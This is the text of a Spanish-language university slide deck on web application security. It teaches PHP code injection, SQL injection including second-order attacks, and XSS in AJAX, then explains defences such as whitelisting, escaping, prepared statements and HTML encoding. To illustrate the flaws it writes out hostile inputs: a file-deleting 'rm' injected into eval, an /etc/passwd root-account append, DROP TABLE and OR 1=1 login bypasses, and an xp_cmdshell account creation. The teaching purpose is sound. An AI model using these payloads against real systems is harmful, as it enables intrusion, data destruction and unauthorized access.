Seguridad Web - Parte 3 - Núcleo de Investigación y Desarrollo

Anuncio
Seguridad WEB
Inyección de código
Maestría en TICs – 2015
Énfasis Auditoría y Seguridad Informática
Seguridad en aplicaciones y base de datos
Cristian Cappo (ccappo@pol.una.py)
NIDTEC - Núcleo de Investigación y Desarrollo Tecnológico - FPUNA
Aplicación del lado servidor
 Se ejecuta en un servidor web (app server)
 Toma la entrada de los usuarios remotos vía el
navegador
 Interactúa con base de datos y otros servidores
 Prepara la salida para los usuarios
2
Ejemplo: PHP (Hypertext Processor)
 Lenguaje scripting con sintaxis al estilo C
 Puede intercalar HTML estático y código
<input value = <?php echo $myvalor; $>>
 Puede incrustar variables de cadenas con
comillas dobles:
$usuario=“Mundo”;echo “Hola $usuario!”;
o $usuario=“Mundo;echo “Hola”. $usuario.“.”;
 Datos de formularios en arreglos globales
_$GET, $POST, ..
3
Inyección de código en PHP
 Calculadora server-side en PHP:
 $in = $_GET[‘val’];
eval(‘$op1=‘. $in. ‘;’);
 Entrada benigna
http://victima.com/calc.php?val=5
 Entrada maliciosa
http://victima.com/calc.php?val=5;system(‘rm *.*’)
 Calc.php ejecuta:
eval(‘$op1=5; system(‘rm *.*’);’);
4
Mas inyección de código en PHP
 Código PHP para enviar mail
$email = $_POST[“email”]
$subject = $_POST[“subject”]
system(“mail $email –s $subject < /tmp/texto”)
 Código atacante
http://victima.com/mail.php?
email=hacker@hackerhome.net&
subject=foo < /usr/passwd; ls
http://victima.com/mail.php?
email=hacker@hackerhome.net&subject=foo;
echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
5
SQL
 Típica generación de código usando SQL
$selecteduser = $_GET['user'];
$sql = "SELECT Username, Clave FROM users " .
"WHERE Username='$selecteduser'";
$rs = $db->executeQuery($sql);
 Que pasa si ‘user’ es una cadena maliciosa que
cambia el significado de la consulta?
6
Típico login
7
Ingrese
Usuario
&
Navegador Password Servidor
(Cliente)
web
SELECT passwd
FROM USERS
WHERE uname
= ‘$user’
DB
8
Login “normal”
Ingrese
Usuario
&
Navegador Password Servidor
(Cliente)
web
SELECT passwd
FROM USERS
WHERE uname
= ‘smith’
DB
9
Entrada maliciosa
10
Inyección SQL (SQLI)
Ingrese
Usuario
&
Navegador Password Servidor
(Cliente)
web
SELECT passwd
FROM USERS
WHERE uname
= ‘’; DROP TABLE
USERS;--’
DB
11
12
Inyección SQL – Idea básica
Servidor víctima
Atacante
1
2
3 Recibe datos desde la
DB
Consulta
No esperada
 Esta es una vulnerabilidad de validación
de entrada
 La entrada de usuario no sanitizada cambia el
sentido original de la consulta SQL.
 Es un caso especial de inyección de
código
DBMS Victima
slide 13
Autenticación con la BD
 set UserFound=execute(
“SELECT * FROM UserTable WHERE
username=‘ ” & form(“user”) & “ ′ AND
password= ‘ ” & form(“pwd”) & “ ′ ” );
El usuario ingresa su código y contraseña, este SQL
chequea si existe tal combinación en la BD.
If not UserFound.EOF
Autenticación correcta
else
Autenticación incorrecta
14
Usando SQLI para ingresar
 El usuario ingresa ′ OR 1=1 - El aplicación web ejecuta la consulta
set UserFound=execute(
SELECT * FROM UserTable WHERE
username=‘’ OR 1=1 -- … );
 Ahora todos los registros son retornados y la
autenticación es correcta
15
Más de SQLI
 El usuario puede dar como código
′ exec cmdshell ‘net user badguy badpwd’ / ADD –
 Y se ejecuta la consulta:
set UserFound=execute(
SELECT * FROM UserTable WHERE
username= ‘’ exec … -- … );
 Crea una cuenta para badguy en el servidor de
base de datos.
16
SQLI de segundo orden
 Los datos guardados en la BD pueden ser
utilizados luego para un SQLI
 Por ejemplo, un usuario cambia su nombre a
admin’- Esta vulnerabilidad puede existir si no se aplica
consistentemente la validación de entrada y el
escapado (por ejemplo de ’ convertir a \’)
 Algunas aplicaciones solo validan la entradas del servidor
web y no así las entradas que vienen de la BD.
 UPDATE users set password =‘jejeje’ where uname
=‘admin’--’
 Tratar a todas las entradas como peligrosas
17
Previniendo los SQLI
 Validar toda la entrada
 Filtrar cualquier carácter que tenga un significado
especial
 Chequear el tipo de dato
 Caracteres permitidos (whitelist)
 Colocar solo los no permitidos a veces no funciona
 Se puede olvidar algunos
 Puede prevenir entradas válidas (por ejemplo O’Higgins)
 Permita solo un conjunto bien definido de valores
seguros
 Puede utilizar expresiones regulares.
18
Escapando
 Caracteres especiales como ‘ provee distinción
entre datos y código en la consulta
 Para entradas válidas con ‘ , use caracteres
escapados.
 Diferentes BD tienen diferentes reglas de
escapado:
 Ejemplos
 escape(O’Higging) = O\’Higging
 escape(O’Higging) = O’’Higging
19
Sentencias SQL precompiladas
 En un SQLI los datos son interpretados como
código
 Variables bind : garantiza que los lugares en
la consulta sean datos (no código)
 Sentencias prepared: permiten la creación de
consultas estáticas con variables bind. Preserva
la estructura de la consulta prevista.
20
Ejemplo de sentencias prepared
/* Ejemplo en Java */
PreparedStatement ps =
db.prepareStatement("SELECT pizza, toppings, quantity, order_day "
+ "FROM orders WHERE userid=? AND order_month=?");
ps.setInt(1, session.getCurrentUserId());
ps.setInt(2, Integer.parseInt(request.getParamenter("month")));
ResultSet res = ps.executeQuery();
Variables bind
(data placeholder)
 La consulta es parseada sin los parámetros
 Las variables bind tienen tipos (int, string, …)
 De todos modos debe seguir cuidando los SQLI de
segundo orden.
21
SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injectioncheatsheet-oku/
Recopilación de “tips” y “trucos” para Inyección
SQL teniendo en cuenta tipo de DBMS (MySQL,
MS SQL Server, Oracle , PostgreSQL)
22
XSS (un poco más)
 Web 2.0
1. HTTP GET
2. HTML and JS
`
3. Asynchronous GET
4. Javascript to wrap in eval
 Los scripts maliciosos pueden estar
 Contenidos en argumentos de JavaScript creados
dinámicamente.
 Contenido en los arreglos JavaScript
 Escritos dinámicamente en el DOM
23
XSS en AJAX
 Flujos en arreglos Javascript
var downstreamArray = new Array();
downstreamArray[0] = “42"; doBadStuff(); var bar=“ajacked";
 No detectado por filtros simples
 No existe <>, “script”, on.., etc
 Solo se necesita romper la doble comilla
24
XSS en AJAX
 Código JSON escrito en el DOM por un script del
lado cliente
var inboundJSON = {"people": [
{"name": "Joel", "address": “<script>badStuff();</script>",
"phone": "911"} ] };
someObject.innerHTML(inboundJSON.people[0].address);
// Vulnerable
document.write(inboundJSON.people[0].address);
// Vulnerable
someObject.innerText(inboundJSON.people[0].address);
// Seguro
 XSS puede estar en el DOM
 document.url, documento.location, document.referer
25
Protegerse contra XSS
 Asegurar que su aplicación valide todas las cabeceras,
cookies, query string, campos de formulario y campos
ocultos
 No intentar identificar contenido activos y removerlos,
filtrarlos o sanitizarlos. Existen demasiados tipos de
contenido activo y muchísimas formas de codificarlo
para sobrepasar los filtros.
 Es recomendable utilizar una política de seguridad
positiva que especifica que es lo que está permitido. La
política de seguridad negativa (mantenimiento de
firmas) son difíciles de mantener y usualmente
incompletas.
26
Prevenir XSS
 Cualquier entrada del usuario debe ser
preprocesada antes de utilizarla dentro de HTML
 Remover /codificar los caracteres especiales
HTML
 Usar una buena librería de escape
 Ejemplo: OWASP ESAPI
 En PHP, htmlspecialchars(string) puede reemplazar
todos los caracteres con sus códigos HTML
 ‘ se convierte a ' “ se convierte a " & se
convierte a &
 En ASP.NET, Server.HtmlEncode(string)
27
Bibliografía
 M. Zalewski. The tangled Web. A guide to
securing Modern Web Applications. 2012.
 M. Shema. Hacking Web Apps. Detecting and
Preventing Web Application Security Problems.
Syngress Press. Elsevier. 2012.
 P. Hope & B. Walther. Web Security Testing
Cookbook. O’Really Media Inc. 2008.
28
¡Gracias!
¿Preguntas?
29
Descargar